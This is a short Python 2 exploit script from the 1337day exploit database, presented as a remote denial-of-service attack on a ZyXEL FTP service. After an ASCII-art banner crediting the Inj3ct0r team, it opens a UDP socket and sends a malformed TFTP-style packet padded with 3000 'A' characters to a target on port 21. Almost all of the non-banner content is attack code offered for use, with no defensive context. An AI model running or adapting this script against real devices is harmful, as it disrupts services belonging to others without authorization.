#!/usr/bin/python
print"1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0"
print"0 _ __ __ __ 1"
print"1 /' \ __ /'__`\ /\ \__ /'__`\ 0"
print"0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1"
print"1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0"
print"0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1"
print"1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0"
print"0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1"
print"1 \ \____/ >> Exploit database separated by exploit 0"
print"0 \/___/ type (local, remote, DoS, etc.) 1"
print"1 1"
print"0 [+] Site : 1337day.com 0"
print"1 [+] Support e-mail : submit[at]1337day.com 1"
print"0 0"
print"1 ######################################### 1"
print"0 I'm Angel Injection member from Inj3ct0r Team 1"
print"0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1"
print"ZyXEL FTP service Remote DDoS"
print"Found And Coded By Angel Injection #"
print"This Exploit For SeeMe"
import socket
host = 'IP Target'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
exploit = "A" * 3000
print "Sending exploit...."
pwned = "\x00\x02" + "A" + "\x00" + exploit + "\x00"
s.sendto(pwned, (host, port))